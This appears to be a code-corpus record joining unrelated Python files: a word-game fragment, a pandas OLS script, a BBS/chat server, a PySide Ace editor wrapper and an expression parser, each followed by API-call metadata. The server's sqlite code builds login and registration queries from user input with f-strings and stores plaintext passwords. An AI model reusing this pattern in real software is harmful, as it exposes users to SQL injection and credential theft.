print(f'Try to guess "{word}". What is the result? ', end = '')
res = input()
update(word, res)
# print(f'len = {len(wordlist)}')
# print(wordlist)
print('Congratulations!')
if __name__ == '__main__':
run()
|
[
"sys.stderr.write",
"sys.exit"
] |
[((2750, 2783), 'sys.stderr.write', 'stderr.write', (['"""Invalid result!\n"""'], {}), "('Invalid result!\\n')\n", (2762, 2783), False, 'from sys import stderr, exit\n'), ((2792, 2800), 'sys.exit', 'exit', (['(-1)'], {}), '(-1)\n', (2796, 2800), False, 'from sys import stderr, exit\n')]
|
import pandas as pd
from .ols_estimator import OLSEstimator
ols = OLSEstimator(pd.read_csv("./data/listings_summary.csv"))
ols.clean_data()
ols.calculate_models()
ols.output_latex()
|
[
"pandas.read_csv"
] |
[((81, 123), 'pandas.read_csv', 'pd.read_csv', (['"""./data/listings_summary.csv"""'], {}), "('./data/listings_summary.csv')\n", (92, 123), True, 'import pandas as pd\n')]
|
import dataparser as dp
import sqlite3
import os.path
import re
from datetime import date
'''
{
"boardName1":{
"post1_SN":[SN,board,title,author,date,content]
"post2_SN":[SN,board,title,author,date,content]
}
"boardName2":{
"post1_SN":[SN,board,title,author,date,content]
}
......
}
'''
class Post():
counter = 0
def __init__(self,board,title,author,date,content,available=True):
if (available==True):
Post.counter += 1
self.SN=Post.counter
self.board=board
self.title=title
self.author=author
self.date=date
self.content=content
self.comments=""
self.available=available
def read(self):
c = self.content.split('<br>')
msg = f"Author: {self.author}\nTitlte: {self.title}\nDate: {self.date}\n--\n"
for comp in c:
msg = msg + comp + '\n'
msg = msg + '--' + self.comments
return msg
def update(self,ntype,new):
if(ntype=="title"): self.title=new
if(ntype=="content"): self.content=new
def comment(self,user,comm):
self.comments += f'\n{user}: {comm}'
def emptypost():
return Post(0,0,0,0,0,False)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
db_path = os.path.join(BASE_DIR, 'userinf.db')
posts=[emptypost()]
Chatrooms={}
def make_jsend(command,data):
return { "command":command, "data":data }
def usrReg(username, email, password):
con = sqlite3.connect(db_path)
c = con.cursor()
c.execute(f"SELECT * FROM user WHERE name='{username}'")
if c.fetchone() is None:
c.execute(f"INSERT INTO USER VALUES (null,'{username}','{email}','{password}')")
con.commit()
con.close()
return 0
else:
con.close()
return -1
def usrlogin(username, password):
con = sqlite3.connect(db_path)
c = con.cursor()
c.execute(f"SELECT * FROM user WHERE name='{username}' AND password='{password}'")
result = c.fetchone()
con.close()
if result != None:
return result[0]
else:
return -1
def listusers():
con = sqlite3.connect(db_path)
c = con.cursor()
msg = 'Name'.ljust(15, ' ') + 'Email'.ljust(20, ' ') + '\n'
for row in c.execute('SELECT * FROM user ORDER BY id'):
msg = msg + str(row[1]).ljust(15, ' ') + str(row[2]).ljust(20, ' ') + '\n'
con.close()
return msg
def listboards():
con = sqlite3.connect(db_path)
c = con.cursor()
msg = 'Index'.ljust(15, ' ') + 'Name'.ljust(15, ' ') + 'Moderator'.ljust(15, ' ') + '\n'
for row in c.execute('SELECT * FROM board ORDER BY "index"'):
msg = msg + str(row[0]).ljust(15, ' ') + str(row[1]).ljust(15, ' ') + str(row[2]).ljust(15, ' ') + '\n'
con.close()
return msg
def addBoard(board_name,moderator):
con = sqlite3.connect(db_path)
c = con.cursor()
c.execute(f"SELECT * FROM BOARD WHERE name='{board_name}'")
if c.fetchone() is None:
c.execute(f"INSERT INTO BOARD VALUES (null,'{board_name}','{moderator}')")
con.commit()
con.close()
return 0
else:
con.close()
return -1
def postExist(post_SN):
    try:
        sn = int(post_SN)
    except ValueError:
        # non-numeric input from the client simply means "not a post"
        return False
    return 0 < sn <= Post.counter and posts[sn].available
def listposts(board_name):
con = sqlite3.connect(db_path)
c = con.cursor()
c.execute(f"SELECT * FROM BOARD WHERE name='{board_name}'")
if c.fetchone() is None: return "Board does not exist."
else:
msg = 'S/N'.ljust(10, ' ') + 'Title'.ljust(15, ' ') + 'Author'.ljust(15, ' ') + 'Date'.ljust(15, ' ') + '\n'
for p in posts:
if (p.available == True and p.board == board_name) :
msg += str(p.SN).ljust(10, ' ') + p.title.ljust(15, ' ') + p.author.ljust(15, ' ') + p.date.ljust(15, ' ') + '\n'
return msg
def addPost(board,title,author,content):
con = sqlite3.connect(db_path)
c = con.cursor()
c.execute(f"SELECT * FROM BOARD WHERE name='{board}'")
if c.fetchone() is None:
return -1
else:
global posts
today = date.today()
MD = f"{today.month}/{today.day}"
#posts[board] = {f'{post_counter}:[{post_counter},{board},{title},{author},{MD},{content}]'}
post = Post(board,title,author,MD,content)
posts.append(post)
return 0
def listrooms():
msg = 'chatroom-name'.ljust(15, ' ') + 'status'.ljust(8, ' ') + '\n'
for k in Chatrooms:
msg = msg + k.ljust(15, ' ') + Chatrooms[k]["status"].ljust(8, ' ') + '\n'
return msg
class tcpCmdHandler(dp.Data_Parser):
command = dp.CommandListener("tcp")
cmdlist = command.tcp_savecmds
def __init__(self, lock, addr):
dp.Data_Parser.__init__(self,lock)
self.addr=addr
@command.listen()
def login(self,jMsg,username,password):
if (jMsg["user"] != "none"):
command = 'none'
sendmsg = 'Please logout first!'
else:
uid = usrlogin(username,password)
if (uid != -1):
command = f'setuser {username} {uid}'
sendmsg = f'Welcome, {username}.'
else:
command = 'none'
sendmsg = 'Login failed.'
return make_jsend(command,sendmsg)
@command.listen(name="get-ip")
def get_ip(self,jMsg):
command = 'none'
sendmsg = f'IP: {self.addr[0]}:{self.addr[1]}'
return make_jsend(command,sendmsg)
@command.listen()
def logout(self,jMsg):
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
elif jMsg["user"] in Chatrooms and Chatrooms[ jMsg["user"] ]["status"]=="open":
command = "none"
sendmsg = 'Please do "attach" and "leave-chatroom" first.'
else:
command = "logout"
sendmsg = f"Bye, {jMsg['user']}"
if jMsg["user"] in Chatrooms : Chatrooms.pop(jMsg["user"])
return make_jsend(command,sendmsg)
@command.listen(name="list-user")
def listuser(self,jMsg):
command = "none"
sendmsg = listusers()
return make_jsend(command,sendmsg)
@command.listen()
def exit(self,jMsg):
if jMsg["user"] in Chatrooms : Chatrooms.pop(jMsg["user"])
command = "exit"
sendmsg = ""
return make_jsend(command,sendmsg)
######## Bulletin Board System ########
@command.listen(name="create-board")
def create_board(self,jMsg,name):
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
else:
check = addBoard(name,jMsg["user"])
if check == 0 :
command = "none"
sendmsg = "Create board successfully."
else:
command = "none"
sendmsg = 'Board already exists.'
return make_jsend(command,sendmsg)
@command.listen(name="create-post", usage="<board-name> --title <title> --content <content>")
def create_post(self,jMsg,board,title,content):
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
else:
self.lock.acquire()
check = addPost(board,title,jMsg['user'],content)
self.lock.release()
if check == 0 :
command = "none"
sendmsg = "Create post successfully."
else:
command = "none"
sendmsg = "Board does not exist."
return make_jsend(command,sendmsg)
@command.listen(name="list-board")
def list_board(self,jMsg):
command = "none"
sendmsg = listboards()
return make_jsend(command,sendmsg)
@command.listen(name="list-post", usage="<board-name>")
def list_post(self,jMsg,board_name):
self.lock.acquire()
command = "none"
sendmsg = listposts(board_name)
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen(usage="<post-S/N>")
def read(self,jMsg,post_SN):
self.lock.acquire()
if( postExist(post_SN) ):
command = "none"
sendmsg = posts[int(post_SN)].read()
else:
command = "none"
sendmsg = "Post does not exist."
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen(name="delete-post", usage="<post-S/N>")
def delete_post(self,jMsg,post_SN):
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
else:
global posts
self.lock.acquire()
if (postExist(post_SN)):
if(posts[int(post_SN)].author == jMsg['user']):
posts[int(post_SN)] = emptypost()
command = "none"
sendmsg = "Delete successfully."
else:
command = "none"
sendmsg = "Not the post owner."
else:
command = "none"
sendmsg = "Post does not exist."
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen(name="update-post", usage="<post-S/N> --title/content <new>")
def update_post(self,jMsg,post_SN,which,inf):
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
else:
global posts
self.lock.acquire()
if (postExist(post_SN)):
if(posts[int(post_SN)].author == jMsg['user']):
if(which=="title"):
posts[int(post_SN)].title = inf
if(which=="content"):
posts[int(post_SN)].content = inf
command = "none"
sendmsg = "Update successfully."
else:
command = "none"
sendmsg = "Not the post owner."
else:
command = "none"
sendmsg = "Post does not exist."
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen(usage="<post-S/N> <comment>")
def comment(self,jMsg,post_SN,comment):
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
else:
global posts
self.lock.acquire()
if (postExist(post_SN)):
posts[int(post_SN)].comment(jMsg['user'],comment)
command = "none"
sendmsg = "Comment successfully."
else:
command = "none"
sendmsg = "Post does not exist."
self.lock.release()
return make_jsend(command,sendmsg)
################### Chat-Server ########################
@command.listen(name="create-chatroom")
def create_chatroom(self,jMsg,port):
global Chatrooms
self.lock.acquire()
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
elif jMsg["user"] in Chatrooms :
command = "none"
sendmsg = "User has already created the chatroom."
else:
Chatrooms[ jMsg["user"] ] = { "port":port, "status":"open" }
command = f"create_chatroom {port}"
sendmsg = ""
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen(name="join-chatroom")
def join_chatroom(self,jMsg,chatroom_name):
global Chatrooms
self.lock.acquire()
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
elif (chatroom_name not in Chatrooms) or (Chatrooms[chatroom_name]["status"]=="close"):
command = "none"
sendmsg = "The chatroom does not exist or the chatroom is close."
else:
port = Chatrooms[ chatroom_name ]["port"]
owner = chatroom_name
command = f"join_chatroom {owner} {port}"
sendmsg = ""
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen(name="restart-chatroom")
def restart_chatroom(self,jMsg):
global Chatrooms
self.lock.acquire()
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
elif (jMsg["user"] not in Chatrooms):
command = "none"
sendmsg = "Please create chatroom first."
elif (Chatrooms[ jMsg["user"] ]["status"]=="open"):
command = "none"
sendmsg = "Your chatroom is still running."
else:
port = Chatrooms[ jMsg["user"] ]["port"]
Chatrooms[ jMsg["user"] ]["status"]="open"
owner = jMsg["user"]
command = f"join_chatroom {owner} {port}"
sendmsg = ""
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen()
def close_chatroom(self,jMsg):
global Chatrooms
self.lock.acquire()
Chatrooms[ jMsg['user'] ]["status"]="close"
self.lock.release()
command = "none"
sendmsg = "none"
return make_jsend(command,sendmsg)
@command.listen()
def attach(self,jMsg):
global Chatrooms
self.lock.acquire()
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
elif (jMsg["user"] not in Chatrooms):
command = "none"
sendmsg = "Please create-chatroom first."
elif (Chatrooms[jMsg["user"]]["status"]=="close"):
command = "none"
sendmsg = "Please restart-chatroom first."
else:
port = Chatrooms[ jMsg["user"] ]["port"]
owner = jMsg["user"]
command = f"join_chatroom {owner} {port}"
sendmsg = ""
self.lock.release()
return make_jsend(command,sendmsg)
########################################################
class udpCmdHandler(dp.Data_Parser):
command = dp.CommandListener("udp")
cmdlist = command.udp_savecmds
def __init__(self,lock):
dp.Data_Parser.__init__(self,lock)
@command.listen()
def hello(self,jMsg):
command = "none"
sendmsg = "hello!"
return make_jsend(command,sendmsg)
@command.listen()
def register(self,jMsg,username,email,password):
check = usrReg(username,email,password)
if check == 0 :
command = "none"
sendmsg = "Register successfully."
else:
command = "none"
sendmsg = 'Username is already used.'
return make_jsend(command,sendmsg)
@command.listen()
def whoami(self,jMsg):
if (jMsg["user"] != "none"):
command = "none"
sendmsg = jMsg["user"]
else:
command = "none"
sendmsg = "Please login first!"
return make_jsend(command,sendmsg)
@command.listen()
def hi(self,jMsg):
command = "none"
sendmsg = "hi."
return make_jsend(command,sendmsg)
@command.listen(name="list-chatroom")
def list_chatroom(self,jMsg):
global Chatrooms
self.lock.acquire()
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
else:
command = "none"
sendmsg = listrooms()
self.lock.release()
return make_jsend(command,sendmsg)
|
[
"dataparser.Data_Parser.__init__",
"dataparser.CommandListener",
"sqlite3.connect",
"datetime.date.today"
] |
[((1558, 1582), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (1573, 1582), False, 'import sqlite3\n'), ((1938, 1962), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (1953, 1962), False, 'import sqlite3\n'), ((2222, 2246), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (2237, 2246), False, 'import sqlite3\n'), ((2535, 2559), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (2550, 2559), False, 'import sqlite3\n'), ((2935, 2959), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (2950, 2959), False, 'import sqlite3\n'), ((3472, 3496), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (3487, 3496), False, 'import sqlite3\n'), ((4072, 4096), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (4087, 4096), False, 'import sqlite3\n'), ((4792, 4817), 'dataparser.CommandListener', 'dp.CommandListener', (['"""tcp"""'], {}), "('tcp')\n", (4810, 4817), True, 'import dataparser as dp\n'), ((14503, 14528), 'dataparser.CommandListener', 'dp.CommandListener', (['"""udp"""'], {}), "('udp')\n", (14521, 14528), True, 'import dataparser as dp\n'), ((4275, 4287), 'datetime.date.today', 'date.today', ([], {}), '()\n', (4285, 4287), False, 'from datetime import date\n'), ((4902, 4937), 'dataparser.Data_Parser.__init__', 'dp.Data_Parser.__init__', (['self', 'lock'], {}), '(self, lock)\n', (4925, 4937), True, 'import dataparser as dp\n'), ((14606, 14641), 'dataparser.Data_Parser.__init__', 'dp.Data_Parser.__init__', (['self', 'lock'], {}), '(self, lock)\n', (14629, 14641), True, 'import dataparser as dp\n')]
|
from PySide.QtCore import QObject, Signal, Slot
from string import Template
import os
EVENT_TEMPLATE = Template("""
py_${func} = function() {
py_ace_editor.${func}(${args});
}
editor.${target}.on("${event_name}", py_${func});
""")
BINDING_TEMPLATE = Template("""
py_ace_editor.${signal}.connect(${target}, "${func}")
""")
class QtAceEditor(QObject):
text_changed = Signal(unicode)
mode_changed = Signal(unicode)
theme_changed = Signal(unicode)
auto_pair_changed = Signal(bool)
font_size_changed = Signal(int)
margin_line_changed = Signal(bool)
margin_line_column_changed = Signal(int)
def __init__(self, parent=None):
""" Initialize the editor
"""
super(QtAceEditor, self).__init__(parent)
self._events = []
self._bindings = []
def set_text(self, text):
""" Set the text of the editor
"""
self._text = text
self.text_changed.emit(text)
@Slot(unicode)
def set_text_from_js(self, text):
""" Set the text from the javascript editor. This method is required
because set_text emits the signal to update the text again.
"""
self._text = text
def text(self):
""" Return the text of the editor
"""
return self._text
def set_mode(self, mode):
""" Set the mode of the editor
"""
if mode.startswith('ace/mode/'):
self._mode = mode
else:
self._mode = 'ace/mode/' + mode
self.mode_changed.emit(self._mode)
def mode(self):
""" Return the mode of the editor
"""
return self._mode
def set_theme(self, theme):
""" Set the theme of the editor
"""
if theme.startswith('ace/theme/'):
self._theme = theme
else:
self._theme = "ace/theme/" + theme
self.theme_changed.emit(self._theme)
def theme(self):
""" Return the theme of the editor
"""
return self._theme
def set_auto_pair(self, auto_pair):
""" Set the auto_pair behavior of the editor
"""
self._auto_pair = auto_pair
self.auto_pair_changed.emit(auto_pair)
def set_font_size(self, font_size):
""" Set the font size of the editor
"""
self._font_size = font_size
self.font_size_changed.emit(font_size)
def show_margin_line(self, margin_line):
""" Set the margin line of the editor
"""
self._margin_line = margin_line
self.margin_line_changed.emit(margin_line)
def set_margin_line_column(self, margin_line_col):
""" Set the margin line column of the editor
"""
self._margin_line_column = margin_line_col
self.margin_line_column_changed.emit(margin_line_col)
def generate_ace_event(self, _func, _target, _args, _event_name):
""" Generate a Javascript ace editor event handler.
Parameters
-----------
_func : string
The python method to be called on the python AceEditor object
_args : string
The javascript expression to pass to the method
_target : string
The Ace Editor target to tie the event to
_event_name : string
The name of the AceEditor event
"""
event = EVENT_TEMPLATE.substitute(func=_func, args=_args,
target=_target,
event_name=_event_name)
self._events.append(event)
def generate_binding(self, _signal, _target, _func):
""" Generate a connection between a Qt signal and a javascript function.
Any parameters given to the signal will be passed to the javascript
function.
Parameters
----------
_signal : string
The name of the Qt signal
_target : string
The name of the target Javascript object
_func : string
The name of the function to call on the target object
"""
binding = BINDING_TEMPLATE.substitute(signal=_signal, target=_target,
func=_func)
self._bindings.append(binding)
def generate_html(self):
""" Generate the html code for the ace editor
"""
# XXX better way to access files here?
p = os.path
template_path = p.join(p.dirname(p.abspath(__file__)),
'tab_ace_test.html')
        with open(template_path, 'r') as f:
            template = Template(f.read())
_r_path = "file://" + p.join(p.dirname(p.abspath(__file__)))
_events = '\n'.join(self._events)
_bindings = '\n'.join(self._bindings)
return template.substitute(events=_events, resource_path=_r_path,
bindings=_bindings)
|
[
"PySide.QtCore.Slot",
"PySide.QtCore.Signal",
"string.Template"
] |
[((104, 261), 'string.Template', 'Template', (['"""\n py_${func} = function() {\n py_ace_editor.${func}(${args});\n }\n editor.${target}.on("${event_name}", py_${func});\n"""'], {}), '(\n """\n py_${func} = function() {\n py_ace_editor.${func}(${args});\n }\n editor.${target}.on("${event_name}", py_${func});\n"""\n )\n', (112, 261), False, 'from string import Template\n'), ((272, 347), 'string.Template', 'Template', (['"""\n py_ace_editor.${signal}.connect(${target}, "${func}")\n"""'], {}), '("""\n py_ace_editor.${signal}.connect(${target}, "${func}")\n""")\n', (280, 347), False, 'from string import Template\n'), ((397, 412), 'PySide.QtCore.Signal', 'Signal', (['unicode'], {}), '(unicode)\n', (403, 412), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((432, 447), 'PySide.QtCore.Signal', 'Signal', (['unicode'], {}), '(unicode)\n', (438, 447), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((468, 483), 'PySide.QtCore.Signal', 'Signal', (['unicode'], {}), '(unicode)\n', (474, 483), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((508, 520), 'PySide.QtCore.Signal', 'Signal', (['bool'], {}), '(bool)\n', (514, 520), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((545, 556), 'PySide.QtCore.Signal', 'Signal', (['int'], {}), '(int)\n', (551, 556), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((583, 595), 'PySide.QtCore.Signal', 'Signal', (['bool'], {}), '(bool)\n', (589, 595), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((629, 640), 'PySide.QtCore.Signal', 'Signal', (['int'], {}), '(int)\n', (635, 640), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((982, 995), 'PySide.QtCore.Slot', 'Slot', (['unicode'], {}), '(unicode)\n', (986, 995), False, 'from PySide.QtCore import QObject, Signal, Slot\n')]
|
import logging
import nodes
from .. import exceptions
from ..lexer import tokens
import traceback
import sys
class SyntaxTree(object):
def _debug(self, text, *args):
if type(text) != str:
text = repr(text)
logging.debug(("<Line %d, Token %d> " % (self.line_num, self.token_counter)) + text, *args)
def _inc_line(self):
self.line_num += 1
self.token_counter = 0
def execute(self, context, time_limit=-1, op_limit=-1):
context.set_op_limit(op_limit)
context.set_time_limit(time_limit)
for expression in self.tree:
expression.reduce(context)
return context
@property
def next_token(self):
try:
return self.tokens[0]
except IndexError:
raise exceptions.OutOfTokens(self.line_num, 'at next token')
def shift_token(self):
self._debug('Shifting token %s', self.next_token)
self.token_counter += 1
try:
token = self.tokens.pop(0)
self.line_num = token.line_num
return token
except IndexError:
raise exceptions.ParseError(self.line_num, "Unexpected end of input")
def unshift_token(self, item):
return self.tokens.insert(0, item)
def __init__(self, context_class, tokens):
self.tokens = tokens
self.tree = nodes.Branch([])
self.line_num = 0
self.context_class = context_class
self.token_counter = 0
def is_identifier(self, token, body):
return isinstance(token, tokens.IdentifierToken) and \
token.body == body
def run(self):
while True:
try:
# look ahead and if there is a binaryoperator in our future,
# handle it
self.tree.append(self.handle_expression())
except exceptions.OutOfTokens as e:
self._debug('*** Out of tokens: %s', e.message)
for line in self.tree:
self._debug("FINAL AST: %s", line)
break
except exceptions.EndContextExecution:
logging.error('Unexpected }')
raise exceptions.ParseError(self.line_num, "Unexpected }")
def dump(self):
for line_num, branch in enumerate(self.tree):
self._debug("Operation %d:\n%s", line_num, branch)
def handle_function_definition(self):
self._debug("Handling a function definition")
self.shift_token() # get rid of (
sig_names = []
while True:
token = self.shift_token()
if isinstance(token, tokens.RightParenToken):
self._debug("Found right paren, continue with rest of function definition")
break # get rid of it
if isinstance(token, tokens.CommaToken):
self._debug("Found comma, continue to next argument")
continue # eat it
if not isinstance(token, tokens.IdentifierToken):
raise exceptions.ParseError(self.line_num,
"Expected an argument name, got %s" % token)
sig_names.append(token.body)
if not isinstance(self.next_token, tokens.LeftCurlyBraceToken):
raise exceptions.ParseError(self.line_num, "Expected {, got %s" % self.next_token)
self.shift_token() # get rid of {
new_branch = nodes.Branch()
while True:
try:
new_branch.append(self.handle_expression())
except exceptions.EndContextExecution:
# end of function declaration
break
func_node = nodes.FunctionNode(self.line_num, self.context_class, sig_names, new_branch)
return func_node
def handle_subscript_notation(self, variable_token):
self._debug("Handling a subscript notation")
self.shift_token() # get rid of [
index_node = self.handle_operator_expression() # ends before ]
sub_node = nodes.SubscriptNotationNode(self.line_num,
nodes.VariableNode(self.line_num, variable_token.body), index_node)
if not isinstance(self.next_token, tokens.RightSquareBraceToken):
raise exceptions.ParseError(self.line_num,
"Unexpected %s during subscript notation parse" %
self.next_token)
self.shift_token()
return sub_node
def handle_function_invocation(self, name_token):
self._debug("Handling a function invocation")
self.shift_token() # get rid of (
arg_tokens = []
self._debug("Examining arguments")
while True:
token = self.next_token
self._debug("Current argument set: %s", repr(arg_tokens))
self._debug("Function Invocation: Consider %s" % token)
if isinstance(token, tokens.RightParenToken):
self.shift_token()
break
arg = self.handle_operator_expression()
if arg is None:
raise exceptions.ParseError(self.line_num,
"Unexpected character")
arg_tokens.append(arg)
if isinstance(self.next_token, tokens.CommaToken):
self._debug("Found comma, continue to next argument")
# eat the comma and keep going
self.shift_token()
continue
self._debug("Done reading arguments in function invocation")
return nodes.InvocationNode(self.line_num, name_token.body, arg_tokens)
def handle_list_expression(self):
self._debug("Handling a list expression")
self.shift_token() # get rid of [
data = nodes.ListNode()
while isinstance(self.next_token, tokens.LineTerminatorToken):
# ignore line breaks here until we see data
self.shift_token()
while True:
self._debug("List looks like this now: %s", data)
if isinstance(self.next_token, tokens.RightSquareBraceToken):
self._debug(
"Encountered a ], shift it off and return the list node.")
self.shift_token()
break
expression = self.handle_operator_expression()
if isinstance(self.next_token, tokens.CommaToken):
# eat the comma and keep going
self.shift_token()
if expression is not None:
data.append(expression)
return data
def handle_dictionary_expression(self):
self._debug("Handling a dictionary expression")
self.shift_token() # get rid of {
data = nodes.DictionaryNode(self.line_num)
while True:
name = self.shift_token()
if isinstance(name, tokens.LineTerminatorToken):
# So, we can have whitespace after a {
self._inc_line()
continue
if isinstance(name, tokens.RightCurlyBraceToken):
# done with this dictionary since we got a }
break
if not isinstance(name, tokens.IdentifierToken) and \
not isinstance(name, tokens.NumberLiteralToken) and \
not isinstance(name, tokens.StringLiteralToken):
raise exceptions.ParseError(self.line_num,
"Expected a name, got %s (%s)" %
(name, name.__class__))
colon = self.shift_token()
if not isinstance(colon, tokens.ColonToken):
raise exceptions.ParseError(self.line_num, "Expected a colon")
# Goes until the end of a line. No comma needed!
expression = self.handle_operator_expression()
if expression is not None:
data[name.body] = expression
return data
def handle_operator_expression(self):
self._debug("Handling operator expression.")
output = []
op_stack = []
prev_token = None
# keep track of the parens opened.
# If we deplete all the (s, stop parsing the operator expression
paren_count = 0
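        # What follows is essentially the shunting-yard algorithm: operands go
        # straight to `output`, operators wait on `op_stack` and are popped by
        # precedence/associativity, so `output` ends up in reverse Polish
        # notation and is rebuilt into a tree at the end of this method.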
while True:
self._debug("Output stack: %s", output)
self._debug("Operator stack: %s", op_stack)
try:
self._debug('The next token is %s', self.next_token)
if isinstance(self.next_token,
tokens.LeftCurlyBraceToken):
self._debug(">> Calling handle_dictionary_expression from operator_expression")
output.append(self.handle_dictionary_expression())
elif isinstance(self.next_token,
tokens.LeftSquareBraceToken):
self._debug(">> Calling handle_list_expression from operator_expression")
output.append(self.handle_list_expression())
elif isinstance(self.next_token,
tokens.RightCurlyBraceToken):
self._debug(
">> } encountered, stop processing operator expression")
self._debug(
str(paren_count))
                    if paren_count > 0:
                        self._debug("Paren count is still positive when a } was encountered.")
                        raise exceptions.ParseError(self.line_num, "Unexpected }")
break
elif isinstance(self.next_token,
tokens.RightSquareBraceToken):
self._debug(
">> ] encountered, stop processing operator expression")
                    if paren_count > 0:
                        self._debug("Paren count is still positive when a ] was encountered.")
                        raise exceptions.ParseError(self.line_num, "Unexpected ]")
break
if isinstance(self.next_token, tokens.LeftParenToken):
self._debug('Incrementing number of parens.')
paren_count += 1
if isinstance(self.next_token, tokens.RightParenToken):
paren_count -= 1
self._debug(">> Decrementing number of parens.")
if paren_count < 1:
self._debug(">> Found an unmatched ), which means this is the end of the operator expression")
# too many )s found. This is the end of
# the operator expression
break
if isinstance(self.next_token, tokens.RightParenToken):
self._debug("THE RIGHT PAREN IS HERE")
self._debug('Parent Count: %d', paren_count)
token = self.shift_token()
self._debug("Operator context: Consider %s", token)
except IndexError:
self._debug("Encountered IndexError, break")
break
if isinstance(token, tokens.LineTerminatorToken) or \
isinstance(token, tokens.RightCurlyBraceToken) or \
isinstance(token, tokens.CommaToken):
self._debug(
'encountered a line terminator, comma, or }, break it out')
if isinstance(token, tokens.LineTerminatorToken):
self._inc_line()
break
if (prev_token is None or
isinstance(prev_token, tokens.OperatorToken)) and \
isinstance(token, tokens.SubtractionOperatorToken):
# unary -
token = tokens.NegationOperatorToken()
if not isinstance(token, tokens.OperatorToken) and not \
isinstance(token, tokens.LiteralToken) and not \
isinstance(token, tokens.IdentifierToken):
msg = "Expected an operator, literal, or identifier. (Got %s: %s)" % \
(token.__class__, token.body)
logging.error(msg)
raise exceptions.ParseError(self.line_num, msg)
if isinstance(token, nodes.Node) or not \
isinstance(token, tokens.OperatorToken):
# If anything is a node, append it
if isinstance(self.next_token, tokens.LeftParenToken):
# function invocation or definition
if token.body == 'function':
output.append(self.handle_function_definition())
else:
output.append(self.handle_function_invocation(token))
elif isinstance(self.next_token,
tokens.LeftSquareBraceToken):
# subscript syntax
output.append(self.handle_subscript_notation(token))
else:
output.append(token)
else:
while len(op_stack) > 0:
token2 = op_stack[-1]
is_left_associative = \
token.associativity == tokens.OperatorToken.LEFT
is_right_associative = \
token.associativity == tokens.OperatorToken.RIGHT
self._debug("Is Left Associative: %s\t"
"Is Right Associative: %s",
is_left_associative, is_right_associative)
if (is_left_associative and token.precedence >= token2.precedence) or \
(is_right_associative and
token.precedence > token2.precedence):
if not isinstance(token, tokens.RightParenToken):
if not isinstance(token2,
tokens.LeftParenToken):
op_token = op_stack.pop()
self._debug(
"Popping %s off stack", op_token.body)
output.append(op_token)
else:
# break because we hit a left paren
break
else:
if not isinstance(token2,
tokens.LeftParenToken):
op_token = op_stack.pop()
output.append(op_token)
else:
# discard left paren and break
op_stack.pop()
break
else:
                    # left operator is equal or larger than right, so break out of the drain loop
break
if not isinstance(token, tokens.RightParenToken):
# push current operator to stack
op_stack.append(token)
# ignore right paren
# hold onto this for the next run in case we need to
# check for unary operators
prev_token = token
self._debug('Done feeding in tokens, now drain the operator stack')
# drain the operator stack
while len(op_stack) > 0:
operator = op_stack.pop()
output.append(operator)
self._debug('Output: ')
self._debug(output)
if len(output) == 0:
# nothing. probably a \n after a ,
return None
tree_stack = []
# turn the list of output tokens into a tree branch
self._debug('Turn list of output tokens into a tree branch')
while True:
try:
token = output.pop(0)
self._debug("Consider %s from output" % token)
except IndexError:
break
if not isinstance(token, tokens.OperatorToken):
tree_stack.append(self.handle_token(token))
else:
self._debug("Tree stack: %s", tree_stack)
self._debug("Determining if %s is unary or binary", token)
if isinstance(token, tokens.BinaryOperatorToken):
self._debug("%s is binary", token)
try:
right, left = tree_stack.pop(), tree_stack.pop()
except IndexError:
logging.error("Encountered IndexError. Tree stack: %s",
tree_stack)
raise exceptions.ParseError(self.line_num)
tree_stack.append(token.get_node(self.line_num, left, right))
elif isinstance(token, tokens.UnaryOperatorToken):
self._debug("%s is unary", token)
target = tree_stack.pop()
tree_stack.append(token.get_node(self.line_num, target))
self._debug("%s" % tree_stack)
        if len(tree_stack) != 1:
            logging.error("Tree stack length is not 1. Contents: %s",
                          tree_stack)
            raise exceptions.ParseError(self.line_num)
self._debug('The final tree leaf: %s', tree_stack[0])
        return tree_stack.pop()
def handle_token(self, token):
self._debug("handle token")
if isinstance(token, nodes.Node) or isinstance(token, nodes.ListNode) or \
isinstance(token, nodes.DictionaryNode):
# already resolved down the chain
self._debug("This token is actually a node, so return it")
return token
elif isinstance(token, tokens.IdentifierToken):
# variable?
if token.body == 'true':
return nodes.BooleanNode(self.line_num, True)
elif token.body == 'false':
return nodes.BooleanNode(self.line_num, False)
self._debug("Deciding that %s is a variable" % token)
return nodes.VariableNode(self.line_num, token.body)
elif isinstance(token, tokens.NumberLiteralToken):
return nodes.NumberNode(self.line_num, token.body)
elif isinstance(token, tokens.StringLiteralToken):
return nodes.StringNode(self.line_num, token.body)
